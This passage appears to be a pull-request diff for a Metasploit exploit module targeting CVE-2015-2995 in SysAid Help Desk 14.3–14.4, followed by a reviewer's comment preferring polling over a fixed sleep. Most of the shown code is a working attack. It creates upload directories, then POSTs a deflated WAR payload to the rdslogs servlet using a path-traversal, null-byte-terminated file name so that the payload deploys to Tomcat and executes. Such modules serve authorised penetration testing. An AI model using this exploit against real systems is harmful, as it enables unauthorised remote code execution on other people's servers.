modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb

```diff
@@ -0,0 +1,126 @@
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2015-2995' ],
+          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
+          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]
+        ],
+      'DefaultOptions' => { 'WfsDelay' => 30 },
+      'Privileged'  => false,
+      'Platform'    => 'java',
+      'Arch'        => ARCH_JAVA,
+      'Targets'     =>
+        [
+          [ 'SysAid Help Desk v14.3 - 14.4 / Java Universal', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 3 2015'))
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptInt.new('SLEEP',
+          [true, 'Seconds to sleep while we wait for WAR deployment', 15]),
+        OptString.new('TARGETURI',
+          [true, 'Base path to the SysAid application', '/sysaid/'])
+      ], self.class)
+  end
+
+
+  def check
+    servlet_path = 'rdslogs'
+    bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
+      'method' => 'POST',
+      'vars_get' => {
+        'rdsName' => bogus_file
+      }
+    })
+    if res and res.code == 200
+      return Exploit::CheckCode::Detected
+    end
+  end
+
+
+  def exploit
+    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
+    tomcat_path = '../../../../'
+    servlet_path = 'rdslogs'
+
+    # We need to create the upload directories before our first attempt to upload the WAR.
+    print_status("#{peer} - Creating upload directory")
+    bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
+    send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
+      'method' => 'POST',
+      'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))),
+      'ctype' => 'application/xml',
+      'vars_get' => {
+        'rdsName' => bogus_file
+      }
+    })
+
+    war_payload = payload.encoded_war({ :app_name => app_base }).to_s
+
+    # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
+    print_status("#{peer} - Uploading WAR file...")
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
+      'method' => 'POST',
+      'data' => Zlib::Deflate.deflate(war_payload),
+      'ctype' => 'application/octet-stream',
+      'vars_get' => {
+        'rdsName' => tomcat_path + app_base + ".war" + "\x00"
+      }
+    })
+
+    # The server either returns a 200 OK when the upload is successful.
+    if res and (res.code == 200)
+      print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
+      " seconds for deployment")
+      register_files_for_cleanup("webapps/" + app_base + ".war")
+      sleep(datastore['SLEEP'])
```

Comment:
I like more use an inquiry method than just sleep 15 seconds =) You already did it before on manageengine_auth_upload :)